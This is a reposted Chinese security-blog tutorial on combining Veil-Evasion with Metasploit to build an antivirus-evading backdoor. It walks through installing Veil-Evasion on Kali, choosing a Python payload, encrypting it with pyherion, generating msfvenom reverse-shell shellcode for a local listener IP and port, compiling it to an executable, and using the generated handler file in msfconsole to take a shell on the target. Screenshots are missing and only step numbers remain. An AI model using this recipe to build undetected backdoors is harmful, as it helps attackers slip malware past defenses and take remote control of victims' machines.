免殺后門之MSF&Veil-Evasion的完美結合


 

本文由即刻安全投稿到玄魂工作室

Veil-Evasion Veil-Framework 框架的一部分,也是其主要的項目。利用它我們可以生成繞過殺軟的 payload kali 上並未安裝,下面我們來進行簡單的安裝。我們直接從 github 上進行 clone 下載:

git clone https://www.github.com/Veil-Framework/Veil-Evasion.git

1

下載完成后,我們還需要對其軟件配置包進行安裝,依次輸入如下命令:

ls
cd Veil-Evasion/
ls
cd setup/
ls
./setup.sh

 

(shell腳本將自動為我們安裝軟件配置包)

2

當安裝至如下位置時,會詢問我們是否繼續安裝,我們輸入 Y 繼續!

3

此時跳出 python for windows 的安裝界面,我們點擊 next 即可。

4

點擊 next 選擇 yes 繼續安裝。

5

繼續 next

6

這里安裝 pywin32-219 我們直接 下一步。

7

這里依然 下一步 。

8

安裝 ruby 環境,我們選擇 accept ,並 next

9

這里我們全選中復選框,並點擊 install 開始安裝!

10

在以上一系列繁雜的安裝過程后下面我們就可以來正常使用 Veil-Evasion 啦!我們進入到 Veil-Evasion目錄下,執行如下命令:

python Veil-Evasion.py

 

圖11

 

成功進入到菜單界面,可以看到當前一共有 51 payload 可用!我們可以使用 list 命令來查看 payload 的詳細信息!根據 payload 編號,這里我選擇 35號的 python payload進行演示!

12

在這個界面,我們可以對該 payload 進行一些基本的配置。例如:編譯后生成文件的格式有效期,並是否進行加密做出配置。這里我選擇使用 pyherion 進行加密!

set USE_PYHERION Y
generate (生成payload)

 

13

這個界面要求我們,選擇一種生成 shellcode 的模板文件。我們就按照默認的選擇 msfvenom  1

IP :192.168.15.135
PORT :4444

 

14

這個界面要求我們,對生成的 payload 進行命名和可執行性的編譯。我隨便命名為 vir 並選擇 免殺效果更好的第 2種方式進行編譯!

15

成功完成以上編譯后,編譯后的文件被保存在 /usr/share/veil-output/compiled/vir.exe 下。

16

同時新生成的 shellcode rc 文件也被保存在了 veil-output下的 handlers目錄下!既然有了 rc 文件,那么我們就可以方便的利用 MSF 進行調用了!

msfconsole -r vir_handler.rc

17

此時當目標系統上成功運行我們生成的 shellcode 后,我們將在 kali 上取得目標系統的反彈 shell

sessions -i 2

shell

18

--------------------------------------------------------------------------------------------------------------------------------

即刻安全是一個專注於網絡安全的研究學習平台。致力於為網絡安全愛好者,打造氛圍良好的技術交流學習領地!本着最初的理念,為廣大讀者用戶提供最前言的技術文章分享,及安全事件的跟蹤報導等資訊!站長信箱: Eternal#secist.com官方Q群: 532925486,官方訂閱號

關注即刻安全訂閱號或者加入其官方qq群,請注明來自玄魂工作室,有驚喜哦!

 

玄魂工作室願意和堅持原創的其他團隊和組織一起為廣大讀者貢獻越來越優質的內容。也願意公益宣傳初創的IT團隊和組織,共同成長。雖然我們還不夠強大,但是願意貢獻一點微薄之力。

更多精彩內容請關注玄魂工作室官方微信訂閱號(xuanhun521,下方二維碼)。問題討論請加qq群:Hacking 1群):303242737   Hacking 2群):147098303

 

玄魂工作室-精彩不斷

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM